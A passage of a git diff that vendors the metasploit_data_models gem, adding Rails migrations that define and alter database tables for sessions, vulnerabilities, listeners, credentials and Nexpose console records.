+ # couldn't find the corresponding close event
+ s.closed_at = s.opened_at
+ s.desc = "?"
+ end
+
+ uuid = o.info[:session_uuid]
+
+ command_events.select { |e| e.info[:session_uuid] == uuid }.each do |e|
+ s.events.build(:created_at => e.created_at, :etype => "command", :command => e.info[:command] )
+ end
+
+ output_events.select { |e| e.info[:session_uuid] == uuid }.each do |e|
+ s.events.build(:created_at => e.created_at, :etype => "output", :output => e.info[:output] )
+ end
+
+ upload_events.select { |e| e.info[:session_uuid] == uuid }.each do |e|
+ s.events.build(:created_at => e.created_at, :etype => "upload", :local_path => e.info[:local_path], :remote_path => e.info[:remote_path] )
+ end
+
+ download_events.select { |e| e.info[:session_uuid] == uuid }.each do |e|
+ s.events.build(:created_at => e.created_at, :etype => "download", :local_path => e.info[:local_path], :remote_path => e.info[:remote_path] )
+ end
+
+ s.events.sort_by(&:created_at)
+
+ s.save!
+ end
+ end
+
+ def self.down
+ drop_table :sessions
+ drop_table :session_events
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110414180600_add_local_id_to_session_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110414180600_add_local_id_to_session_table.rb
new file mode 100755
index 0000000000..7c0e57c505
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110414180600_add_local_id_to_session_table.rb
@@ -0,0 +1,11 @@
+class AddLocalIdToSessionTable < ActiveRecord::Migration
+
+ def self.up
+ add_column :sessions, :local_id, :integer
+ end
+
+ def self.down
+ remove_column :sessions, :local_id
+ end
+
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110415175705_add_routes_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110415175705_add_routes_table.rb
new file mode 100755
index 0000000000..1eb104f9bf
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110415175705_add_routes_table.rb
@@ -0,0 +1,18 @@
+class AddRoutesTable < ActiveRecord::Migration
+
+ def self.up
+ create_table :routes do |t|
+ t.integer :session_id
+ t.string :subnet
+ t.string :netmask
+ end
+
+ remove_column :sessions, :routes
+ end
+
+ def self.down
+ drop_table :routes
+
+ add_column :sessions, :routes, :string
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110422000000_convert_binary.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110422000000_convert_binary.rb
new file mode 100755
index 0000000000..4fa3428ad1
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110422000000_convert_binary.rb
@@ -0,0 +1,72 @@
+class ConvertBinary < ActiveRecord::Migration
+
+
+ class WebPage < ActiveRecord::Base
+ serialize :headers
+ end
+
+ class WebVuln < ActiveRecord::Base
+ serialize :params
+ end
+
+ def bfilter(str)
+ str = str.to_s
+ str.encoding = 'binary' if str.respond_to?('encoding=')
+ str.gsub(/[\x00\x7f-\xff]/, '')
+ end
+
+ def self.up
+ rename_column :web_pages, :body, :body_text
+ rename_column :web_pages, :request, :request_text
+ rename_column :web_vulns, :request, :request_text
+ rename_column :web_vulns, :proof, :proof_text
+
+ add_column :web_pages, :body, :binary
+ add_column :web_pages, :request, :binary
+ add_column :web_vulns, :request, :binary
+ add_column :web_vulns, :proof, :binary
+
+ WebPage.find(:all).each { |r| r.body = r.body_text; r.save! }
+ WebPage.find(:all).each { |r| r.request = r.request_text; r.save! }
+ WebVuln.find(:all).each { |r| r.proof = r.proof_text; r.save! }
+ WebVuln.find(:all).each { |r| r.request = r.request_text; r.save! }
+
+ remove_column :web_pages, :body_text
+ remove_column :web_pages, :request_text
+ remove_column :web_vulns, :request_text
+ remove_column :web_vulns, :proof_text
+
+ WebPage.connection.schema_cache.clear!
+ WebPage.reset_column_information
+ WebVuln.connection.schema_cache.clear!
+ WebVuln.reset_column_information
+ end
+
+ def self.down
+
+ rename_column :web_pages, :body, :body_binary
+ rename_column :web_pages, :request, :request_binary
+ rename_column :web_vulns, :request, :request_binary
+ rename_column :web_vulns, :proof, :proof_binary
+
+ add_column :web_pages, :body, :text
+ add_column :web_pages, :request, :text
+ add_column :web_vulns, :request, :text
+ add_column :web_vulns, :proof, :text
+
+ WebPage.find(:all).each { |r| r.body = bfilter(r.body_binary); r.save! }
+ WebPage.find(:all).each { |r| r.request = bfilter(r.request_binary); r.save! }
+ WebVuln.find(:all).each { |r| r.proof = bfilter(r.proof_binary); r.save! }
+ WebVuln.find(:all).each { |r| r.request = bfilter(r.request_binary); r.save! }
+
+ remove_column :web_pages, :body_binary
+ remove_column :web_pages, :request_binary
+ remove_column :web_vulns, :request_binary
+ remove_column :web_vulns, :proof_binary
+
+ WebPage.connection.schema_cache.clear!
+ WebPage.reset_column_information
+ WebVuln.connection.schema_cache.clear!
+ WebVuln.reset_column_information
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110425095900_add_last_seen_to_sessions.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110425095900_add_last_seen_to_sessions.rb
new file mode 100755
index 0000000000..48380af6ae
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110425095900_add_last_seen_to_sessions.rb
@@ -0,0 +1,8 @@
+class AddLastSeenToSessions < ActiveRecord::Migration
+ def self.up
+ add_column :sessions, :last_seen, :timestamp
+ end
+ def self.down
+ remove_column :sessions, :last_seen
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110513143900_track_successful_exploits.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110513143900_track_successful_exploits.rb
new file mode 100755
index 0000000000..7c55105fe8
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110513143900_track_successful_exploits.rb
@@ -0,0 +1,31 @@
+class TrackSuccessfulExploits < ActiveRecord::Migration
+
+
+ class ExploitedHost < ActiveRecord::Base
+ end
+
+ class Vuln < ActiveRecord::Base
+ end
+
+ def self.up
+ add_column :vulns, :exploited_at, :timestamp
+
+ # Migrate existing exploited_hosts entries
+
+ ExploitedHost.find(:all).select {|x| x.name}.each do |exploited_host|
+ next unless(exploited_host.name =~ /^(exploit|auxiliary)\//)
+ vulns = Vuln.find_all_by_name_and_host_id(exploited_host.name, exploited_host.host_id)
+ next if vulns.empty?
+ vulns.each do |vuln|
+ vuln.exploited_at = exploited_host.updated_at
+ vuln.save
+ end
+ end
+
+ end
+
+ def self.down
+ remove_column :vulns, :exploited_at
+ end
+
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb
new file mode 100755
index 0000000000..e1b8955b7f
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb
@@ -0,0 +1,26 @@
+class RenameAndPruneNessusVulns < ActiveRecord::Migration
+
+ class Vuln < ActiveRecord::Base
+ end
+
+ # No table changes, just vuln renaming to drop the NSS id
+ # from those vulns that have it and a descriptive name.
+ def self.up
+ Vuln.find(:all).each do |v|
+ if v.name =~ /^NSS-0?\s*$/
+ v.delete
+ next
+ end
+ next unless(v.name =~ /^NSS-[0-9]+\s(.+)/)
+ new_name = $1
+ next if(new_name.nil? || new_name.strip.empty?)
+ v.name = new_name
+ v.save!
+ end
+ end
+
+ def self.down
+ say "Cannot un-rename and un-prune NSS vulns for migration 20110517160800."
+ end
+
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000000_add_task_id_to_reports_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000000_add_task_id_to_reports_table.rb
new file mode 100755
index 0000000000..5af2d46704
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000000_add_task_id_to_reports_table.rb
@@ -0,0 +1,11 @@
+class AddTaskIdToReportsTable < ActiveRecord::Migration
+
+ def self.up
+ add_column :reports, :task_id, :integer
+ end
+
+ def self.down
+ remove_column :reports, :task_id
+ end
+
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000001_add_api_keys_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000001_add_api_keys_table.rb
new file mode 100755
index 0000000000..13e6ecedd0
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000001_add_api_keys_table.rb
@@ -0,0 +1,12 @@
+class AddApiKeysTable < ActiveRecord::Migration
+ def self.up
+ create_table :api_keys do |t|
+ t.text :token
+ t.timestamps
+ end
+ end
+ def self.down
+ drop_table :api_keys
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110606000001_add_macros_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110606000001_add_macros_table.rb
new file mode 100755
index 0000000000..bfb8ef6085
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110606000001_add_macros_table.rb
@@ -0,0 +1,16 @@
+class AddMacrosTable < ActiveRecord::Migration
+ def self.up
+ create_table :macros do |t|
+ t.timestamps
+ t.text :owner
+ t.text :name
+ t.text :description
+ t.binary :actions
+ t.binary :prefs
+ end
+ end
+ def self.down
+ drop_table :macros
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110622000000_add_settings_to_tasks_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110622000000_add_settings_to_tasks_table.rb
new file mode 100755
index 0000000000..ee9ee21070
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110622000000_add_settings_to_tasks_table.rb
@@ -0,0 +1,12 @@
+class AddSettingsToTasksTable < ActiveRecord::Migration
+
+ def self.up
+ add_column :tasks, :settings, :binary
+ end
+
+ def self.down
+ remove_column :tasks, :settings
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110624000001_add_listeners_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110624000001_add_listeners_table.rb
new file mode 100755
index 0000000000..c541be2131
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110624000001_add_listeners_table.rb
@@ -0,0 +1,19 @@
+class AddListenersTable < ActiveRecord::Migration
+ def self.up
+ create_table :listeners do |t|
+ t.timestamps
+ t.integer :workspace_id, :null => false, :default => 1
+ t.integer :task_id
+ t.boolean :enabled, :default => true
+ t.text :owner
+ t.text :payload
+ t.text :address
+ t.integer :port
+ t.binary :options
+ end
+ end
+ def self.down
+ drop_table :listeners
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110625000001_add_macro_to_listeners_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110625000001_add_macro_to_listeners_table.rb
new file mode 100755
index 0000000000..283d102105
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110625000001_add_macro_to_listeners_table.rb
@@ -0,0 +1,12 @@
+class AddMacroToListenersTable < ActiveRecord::Migration
+
+ def self.up
+ add_column :listeners, :macro, :text
+ end
+
+ def self.down
+ remove_column :listeners, :macro
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000001_add_nexpose_consoles_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000001_add_nexpose_consoles_table.rb
new file mode 100755
index 0000000000..037af40ae1
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000001_add_nexpose_consoles_table.rb
@@ -0,0 +1,21 @@
+class AddNexposeConsolesTable < ActiveRecord::Migration
+ def self.up
+ create_table :nexpose_consoles do |t|
+ t.timestamps
+ t.boolean :enabled, :default => true
+ t.text :owner
+ t.text :address
+ t.integer :port, :default => 3780
+ t.text :username
+ t.text :password
+ t.text :status
+ t.text :version
+ t.text :cert
+ t.binary :cached_sites
+ end
+ end
+ def self.down
+ drop_table :nexpose_consoles
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb
new file mode 100755
index 0000000000..9411724344
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb
@@ -0,0 +1,12 @@
+class AddNameToNexposeConsolesTable < ActiveRecord::Migration
+
+ def self.up
+ add_column :nexpose_consoles, :name, :text
+ end
+
+ def self.down
+ remove_column :nexpose_consoles, :name
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110717000001_add_profiles_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110717000001_add_profiles_table.rb
new file mode 100755
index 0000000000..c0b8831bf1
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110717000001_add_profiles_table.rb
@@ -0,0 +1,15 @@
+class AddProfilesTable < ActiveRecord::Migration
+ def self.up
+ create_table :profiles do |t|
+ t.timestamps
+ t.boolean :active, :default => true
+ t.text :name
+ t.text :owner
+ t.binary :settings
+ end
+ end
+ def self.down
+ drop_table :profiles
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110727163801_expand_cred_ptype_column.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110727163801_expand_cred_ptype_column.rb
new file mode 100755
index 0000000000..b5fce6fd8f
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110727163801_expand_cred_ptype_column.rb
@@ -0,0 +1,9 @@
+class ExpandCredPtypeColumn < ActiveRecord::Migration
+ def self.up
+ change_column :creds, :ptype, :string, :limit => 256
+ end
+ def self.down
+ change_column :creds, :ptype, :string, :limit => 16
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110730000001_add_initial_indexes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110730000001_add_initial_indexes.rb
new file mode 100755
index 0000000000..4085f64843
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110730000001_add_initial_indexes.rb
@@ -0,0 +1,85 @@
+class AddInitialIndexes < ActiveRecord::Migration
+ def self.up
+
+
+ add_index :hosts, :address
+ add_index :hosts, :address6
+ add_index :hosts, :name
+ add_index :hosts, :state
+ add_index :hosts, :os_name
+ add_index :hosts, :os_flavor
+ add_index :hosts, :purpose
+
+ # Removed (conditionally dropped in the next migration)
+ # add_index :hosts, :comments
+
+ add_index :services, :port
+ add_index :services, :proto
+ add_index :services, :state
+ add_index :services, :name
+
+ # Removed (conditionally dropped in the next migration)
+ # add_index :services, :info
+
+ add_index :notes, :ntype
+
+ add_index :vulns, :name
+
+ # Removed (conditionally dropped in the next migration)
+ # add_index :vulns, :info
+
+ add_index :refs, :name
+
+ add_index :web_sites, :vhost
+ add_index :web_sites, :comments
+ add_index :web_sites, :options
+
+ add_index :web_pages, :path
+ add_index :web_pages, :query
+
+ add_index :web_forms, :path
+
+ add_index :web_vulns, :path
+ add_index :web_vulns, :method
+ add_index :web_vulns, :name
+ end
+
+ def self.down
+
+ remove_index :hosts, :address
+ remove_index :hosts, :address6
+ remove_index :hosts, :name
+ remove_index :hosts, :state
+ remove_index :hosts, :os_name
+ remove_index :hosts, :os_flavor
+ remove_index :hosts, :purpose
+ remove_index :hosts, :comments
+
+ remove_index :services, :port
+ remove_index :services, :proto
+ remove_index :services, :state
+ remove_index :services, :name
+ remove_index :services, :info
+
+ remove_index :notes, :ntype
+
+ remove_index :vulns, :name
+ remove_index :vulns, :info
+
+ remove_index :refs, :name
+
+ remove_index :web_sites, :vhost
+ remove_index :web_sites, :comments
+ remove_index :web_sites, :options
+
+ remove_index :web_pages, :path
+ remove_index :web_pages, :query
+
+ remove_index :web_forms, :path
+
+ remove_index :web_vulns, :path
+ remove_index :web_vulns, :method
+ remove_index :web_vulns, :name
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110812000001_prune_indexes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110812000001_prune_indexes.rb
new file mode 100755
index 0000000000..54b681f273
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110812000001_prune_indexes.rb
@@ -0,0 +1,23 @@
+class PruneIndexes < ActiveRecord::Migration
+ def self.up
+
+ if indexes(:hosts).map{|x| x.columns }.flatten.include?("comments")
+ remove_index :hosts, :comments
+ end
+
+ if indexes(:services).map{|x| x.columns }.flatten.include?("info")
+ remove_index :services, :info
+ end
+
+ if indexes(:vulns).map{|x| x.columns }.flatten.include?("info")
+ remove_index :vulns, :info
+ end
+ end
+
+ def self.down
+ add_index :hosts, :comments
+ add_index :services, :info
+ add_index :vulns, :info
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110922000000_expand_notes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110922000000_expand_notes.rb
new file mode 100755
index 0000000000..4e77303fa0
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110922000000_expand_notes.rb
@@ -0,0 +1,9 @@
+class ExpandNotes < ActiveRecord::Migration
+ def self.up
+ change_column :notes, :data, :text
+ end
+ def self.down
+ change_column :notes, :data, :string, :limit => 65536
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110928101300_add_mod_ref_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110928101300_add_mod_ref_table.rb
new file mode 100755
index 0000000000..24f16d642f
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110928101300_add_mod_ref_table.rb
@@ -0,0 +1,17 @@
+# Probably temporary, a spot to stash module names and their associated refs
+# Don't count on it being populated at any given moment.
+class AddModRefTable < ActiveRecord::Migration
+
+ def self.up
+ create_table :mod_refs do |t|
+ t.string :module, :limit => 1024
+ t.string :mtype, :limit => 128
+ t.text :ref
+ end
+ end
+
+ def self.down
+ drop_table :mod_refs
+ end
+
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111011110000_add_display_name_to_reports_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111011110000_add_display_name_to_reports_table.rb
new file mode 100755
index 0000000000..f0c54fed98
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111011110000_add_display_name_to_reports_table.rb
@@ -0,0 +1,24 @@
+class AddDisplayNameToReportsTable < ActiveRecord::Migration
+
+ class Report < ActiveRecord::Base
+ end
+
+ def self.up
+
+ add_column :reports, :name, :string, :limit => 63
+
+ # Migrate to have a default name.
+
+ Report.find(:all).each do |report|
+ rtype = report.rtype.to_s =~ /^([A-Z0-9]+)\x2d/i ? $1 : "AUDIT"
+ default_name = rtype[0,57].downcase.capitalize + "-" + report.id.to_s[0,5]
+ report.name = default_name
+ report.save
+ end
+ end
+
+ def self.down
+ remove_column :reports, :name
+ end
+
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111203000000_inet_columns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111203000000_inet_columns.rb
new file mode 100755
index 0000000000..6e86654bc5
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111203000000_inet_columns.rb
@@ -0,0 +1,13 @@
+class InetColumns < ActiveRecord::Migration
+
+ def self.up
+ change_column :hosts, :address, 'INET using address::INET'
+ remove_column :hosts, :address6
+ end
+
+ def self.down
+ change_column :hosts, :address, :text
+ add_column :hosts, :address6, :text
+ end
+
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111204000000_more_inet_columns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111204000000_more_inet_columns.rb
new file mode 100755
index 0000000000..56adf64625
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111204000000_more_inet_columns.rb
@@ -0,0 +1,17 @@
+class MoreInetColumns < ActiveRecord::Migration
+
+ def self.up
+ change_column :wmap_requests, :address, 'INET using address::INET'
+ remove_column :wmap_requests, :address6
+ change_column :wmap_targets, :address, 'INET using address::INET'
+ remove_column :wmap_targets, :address6
+ end
+
+ def self.down
+ change_column :wmap_requests, :address, :string, :limit => 16
+ add_column :wmap_requests, :address6, :string, :limit => 255
+ change_column :wmap_targets, :address, :string, :limit => 16
+ add_column :wmap_targets, :address6, :string, :limit => 255
+ end
+
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111210000000_add_scope_to_hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111210000000_add_scope_to_hosts.rb
new file mode 100755
index 0000000000..2bbe8f9f77
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111210000000_add_scope_to_hosts.rb
@@ -0,0 +1,9 @@
+class AddScopeToHosts < ActiveRecord::Migration
+ def self.up
+ add_column :hosts, :scope, :text
+ end
+
+ def self.down
+ remove_column :hosts, :scope
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120126110000_add_virtual_host_to_hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120126110000_add_virtual_host_to_hosts.rb
new file mode 100755
index 0000000000..5e9833d884
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120126110000_add_virtual_host_to_hosts.rb
@@ -0,0 +1,9 @@
+class AddVirtualHostToHosts < ActiveRecord::Migration
+ def self.up
+ add_column :hosts, :virtual_host, :text
+ end
+
+ def self.down
+ remove_column :hosts, :viritual_host
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120411173220_rename_workspace_members.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120411173220_rename_workspace_members.rb
new file mode 100755
index 0000000000..75003d6d36
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120411173220_rename_workspace_members.rb
@@ -0,0 +1,9 @@
+class RenameWorkspaceMembers < ActiveRecord::Migration
+ def up
+ rename_table :project_members, :workspace_members
+ end
+
+ def down
+ rename_table :workspace_members, :project_members
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120601152442_add_counter_caches_to_hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120601152442_add_counter_caches_to_hosts.rb
new file mode 100755
index 0000000000..fcd2f9e0ca
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120601152442_add_counter_caches_to_hosts.rb
@@ -0,0 +1,21 @@
+class AddCounterCachesToHosts < ActiveRecord::Migration
+
+ def self.up
+ add_column :hosts, :note_count, :integer, :default => 0
+ add_column :hosts, :vuln_count, :integer, :default => 0
+ add_column :hosts, :service_count, :integer, :default => 0
+
+ Mdm::Host.reset_column_information
+ Mdm::Host.all.each do |h|
+ Mdm::Host.reset_counters h.id, :notes
+ Mdm::Host.reset_counters h.id, :vulns
+ Mdm::Host.reset_counters h.id, :services
+ end
+ end
+
+ def self.down
+ remove_column :hosts, :note_count
+ remove_column :hosts, :vuln_count
+ remove_column :hosts, :service_count
+ end
+end
\ No newline at end of file
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000000_add_vuln_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000000_add_vuln_details.rb
new file mode 100755
index 0000000000..0f946da39c
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000000_add_vuln_details.rb
@@ -0,0 +1,34 @@
+class AddVulnDetails < ActiveRecord::Migration
+
+ def self.up
+ create_table :vuln_details do |t|
+ t.integer :vuln_id # Vuln table reference
+ t.float :cvss_score # 0.0 to 10.0
+ t.string :cvss_vector # Ex: (AV:N/AC:L/Au:N/C:C/I:C/A:C)(AV:N/AC:L/Au:N/C:C/I:C/A:C)
+
+ t.string :title # Short identifier
+ t.text :description # Plain text or HTML (trusted)
+ t.text :solution # Plain text or HTML (trusted)
+ t.binary :proof # Should be UTF-8, but may not be, sanitize on output
+ # Technically this duplicates vuln.info, but that field
+ # is poorly managed / handled today. Eventually we will
+ # replace vuln.info
+
+ # Nexpose-specific fields
+ t.integer :nx_console_id # NexposeConsole table reference
+ t.integer :nx_device_id # Reference from the Nexpose side
+ t.string :nx_vuln_id # 'jre-java-update-flaw'
+ t.float :nx_severity # 0-10
+ t.float :nx_pci_severity # 0-10
+ t.timestamp :nx_published # Normalized from "20081205T000000000"
+ t.timestamp :nx_added # Normalized from "20081205T000000000"
+ t.timestamp :nx_modified # Normalized from "20081205T000000000"
+ t.text :nx_tags # Comma separated
+
+ end
+ end
+
+ def self.down
+ drop_table :vuln_details
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000001_add_host_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000001_add_host_details.rb
new file mode 100755
index 0000000000..36e70892fa
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000001_add_host_details.rb
@@ -0,0 +1,16 @@
+class AddHostDetails < ActiveRecord::Migration
+
+ def self.up
+ create_table :host_details do |t|
+ t.integer :host_id # Host table reference
+
+ # Nexpose-specific fields
+ t.integer :nx_console_id # NexposeConsole table reference
+ t.integer :nx_device_id # Reference from the Nexpose side
+ end
+ end
+
+ def self.down
+ drop_table :host_details
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000002_expand_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000002_expand_details.rb
new file mode 100755
index 0000000000..bd240ecdc5
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000002_expand_details.rb
@@ -0,0 +1,16 @@
+class ExpandDetails < ActiveRecord::Migration
+
+ def self.up
+ add_column :vuln_details, :nx_vuln_status, :text
+ add_column :vuln_details, :nx_proof_key, :text
+ add_column :vuln_details, :src, :string
+ add_column :host_details, :src, :string
+ end
+
+ def self.down
+ remove_column :vuln_details, :nx_vuln_status
+ remove_column :vuln_details, :nx_proof_key
+ remove_column :vuln_details, :src
+ remove_column :host_details, :src
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000003_expand_details2.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000003_expand_details2.rb
new file mode 100755
index 0000000000..4122503692
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000003_expand_details2.rb
@@ -0,0 +1,24 @@
+class ExpandDetails2 < ActiveRecord::Migration
+
+ def self.up
+ add_column :host_details, :nx_site_name, :string
+ add_column :host_details, :nx_site_importance, :string
+ add_column :host_details, :nx_scan_template, :string
